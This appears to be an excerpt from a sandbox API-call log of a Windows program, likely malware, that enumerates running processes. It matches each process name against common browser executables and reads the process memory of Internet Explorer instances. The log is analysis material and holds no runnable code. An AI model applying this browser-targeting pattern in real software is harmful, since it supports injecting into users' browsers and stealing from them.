	[0254.118] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.118] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xab28
	[0254.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.120] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.121] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.121] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.121] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0254.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xab2c
	[0254.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.123] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0254.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.123] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.123] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0254.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.124] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0254.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xab30
	[0254.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.125] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.125] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.125] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.126] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0254.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xab34
	[0254.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.127] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0254.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.127] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.127] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0254.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.128] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0254.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0254.129] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0254.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xab38
	[0254.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.130] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0254.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.130] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.131] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0254.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.132] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.132] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0254.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xab3c
	[0254.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.133] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0254.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.133] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.134] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0254.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.134] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0254.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xab40
	[0254.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.135] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0254.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.135] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.136] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0254.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.136] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.136] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0254.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xab44
	[0254.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.137] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0254.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.138] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.138] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0254.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.138] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0254.139] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xab48
	[0254.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.140] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0254.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.140] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.141] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0254.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.142] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0254.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xab4c
	[0254.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.143] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0254.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.143] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.144] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0254.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.144] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.144] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0254.145] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xab50
	[0254.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.145] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0254.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.145] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.146] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0254.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.146] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.147] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0254.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xab54
	[0254.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.148] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0254.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.148] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.149] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0254.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.149] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0254.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xab58
	[0254.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.150] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0254.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.151] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.151] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0254.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.151] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.151] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0254.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xab5c
	[0254.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.152] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0254.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.152] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.153] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0254.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.153] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.153] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0254.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xab60
	[0254.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.154] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0254.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.155] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.155] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0254.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.156] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0254.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xab64
	[0254.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.158] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0254.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.158] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.159] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0254.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.160] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0254.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xab68
	[0254.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.161] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0254.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.161] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.162] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0254.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.163] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0254.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xab6c
	[0254.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.165] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0254.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.165] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.166] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0254.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.167] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0254.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xab70
	[0254.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.168] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0254.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.169] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.169] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0254.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.170] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xab74
	[0254.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.171] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0254.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.171] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0254.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.172] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0254.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.172] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.172] NtQueryInformationProcess (in: ProcessHandle=0xab74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0254.172] ReadProcessMemory (in: hProcess=0xab74, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0254.172] ReadProcessMemory (in: hProcess=0xab74, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0254.173] ReadProcessMemory (in: hProcess=0xab74, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0254.173] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0254.173] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xab78
	[0254.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.174] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0254.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.174] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0254.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.174] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0254.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.175] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.175] NtQueryInformationProcess (in: ProcessHandle=0xab78, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0254.175] ReadProcessMemory (in: hProcess=0xab78, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0254.175] ReadProcessMemory (in: hProcess=0xab78, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0254.175] ReadProcessMemory (in: hProcess=0xab78, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0254.175] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0254.175] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xab7c
	[0254.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.176] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.177] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.177] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.177] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
